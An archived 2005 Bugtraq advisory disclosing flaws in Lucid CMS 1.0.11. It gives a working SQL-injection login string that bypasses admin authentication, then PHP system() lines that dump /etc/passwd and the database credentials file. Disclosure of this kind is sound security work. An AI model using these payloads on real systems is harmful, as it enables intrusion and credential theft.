lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050929205124.8897.qmail@securityfocus.com>
Date: 29 Sep 2005 20:51:24 -0000
From: retrogod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution


Lucid CMS 1.0.11 SQL Injection / Login Bypass / remote code execution

software:
site: http://lucidcms.net/
description:
lucidCMS is a simple and flexible content management system for the individual or
organization that wishes to manage a collection of web pages without the overhead
and complexity of other available "community" CMS options.


1) if magic quotes off -> SQL Injection:

you can login as admin typing in login form:


login: 'UNION(SELECT'1','admin','admin','FAKE@...mail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*
pass: [nothing]                                                   ^
                                                                  |
                                                                  |
                                                            this is the hash of...nothing
                                                            the result of md5('');
note:"login" without spaces

the login query become:
SELECT * FROM lucid_users WHERE name=''UNION(SELECT'1','admin','admin','FAKE@...mail.com','d41d8cd98f00b204e9800998ecf8427e','1')/*'

2)
now new admin can edit template and insert evil javascript code, see the phpinfo(), manage users/groups,
activate/disable plugins, you can activate renderPHP plugin, add the following line at the end of
the main stylesheet:

<?php error_reporting(0); system('cat /etc/passwd > temp.txt'); ?>

to see /etc/passwd file

<?php error_reporting(0); system('cat dBConfig.php > temp.txt'); ?>

to see database username/password, the database name and table prefix... now you have the full control
of the database


rgod
site: http://altervista.org
mail: retrogod@...ceposta.it
original advisory: http://rgod.altervista.org/lucidcms1011.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ